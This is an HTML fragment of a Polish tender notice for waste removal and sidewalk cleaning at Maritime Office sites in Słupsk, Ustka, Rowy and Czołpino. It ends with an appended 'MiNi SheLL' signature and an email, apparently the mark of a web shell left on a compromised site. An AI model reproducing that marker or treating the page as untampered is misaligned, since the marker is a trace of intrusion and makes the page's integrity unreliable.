<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4.1. Urzędu Morskiego w Słupsku przy al. Sienkiewicza 18 oraz ul. Niemcewicza 15a
1.SM - 1100 l (1,1 m3) - 3 szt.
2.Sprzątanie chodnika (575 m2) ul. Niemcewicza 15a
Ilość wywozu nieczystości: 259  m3
Ilość sprzątanie chodnika:20 700 m2
Według grafiku i na żądanie.

4.2. Kapitanatu Portu Ustka
1.Sprzątanie chodnika (200 m2) ul. Zaruskiego
2.SPW - 10 m3 - 1 szt.
3.SM - 1100 l (1,1 m3) - 1 szt.
4.druciak- 1500 l (1,5 m3) - 1 szt. 
Ilość sprzątanie chodnika: 7 200 m2
Według grafiku i na żądanie.

4.3. Kapitanatu Portu Ustka - przy Nabrzeżu Słupskim
1)SPW - 10 m3 - 1 szt.
2)SM - 1100 l (1,1 m3) - 1 szt.
3)druciak 1500 l (1,5 m3) - 1 szt.
Według grafiku i na żądanie.

4.4. OOW Ustka ul. Kościuszki
1.SM - 1100 l (1,1 m3) - 2 szt.
Według grafiku i na żądanie.

4.5. OOW Ustka ul. Westerplatte przy plaży
1.SM - 120 l (0,120 m3) - 1 szt.
Według grafiku i na żądanie

Ilość wywozu nieczystości od pkt 4.2. do pkt 4.5. z wyłączeniem sprzątania chodnika: 1146  m3

4.6. Ośrodek Wczasowy ALGA
1) SM - 1100 l (1,1 m3) - 1  szt.
2)druciak- 1500 l (1,5 m3) - 1 szt.
Według grafiku i na żądanie

Ilość wywozu nieczystości: 40  m3

4.7. Bosmanatu Portu Rowy - Nabrzeże Południowe
1)SM - 1100 l (1,1 m3) - 1 szt.
2)druciak - 1500 l (1,5 m3) - 1 szt.

Według grafiku i na żądanie

4.8. Bosmanatu Portu Rowy - biuro
1)SM - 1100 l (1,1 m3) - 2 szt.
2)druciak - 1500 l (1,5 m3) - 1 szt.
Według grafiku i na żądanie

Ilość wywozu nieczystości dla pkt 4.7 i 4.8:185 m3

4.9.  Latarnia Morska w  Czołpinie
1.SPW -10 m3 - 1 szt.
Ilość wywozu nieczystości: 30 m3

Według grafiku i na żądanie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com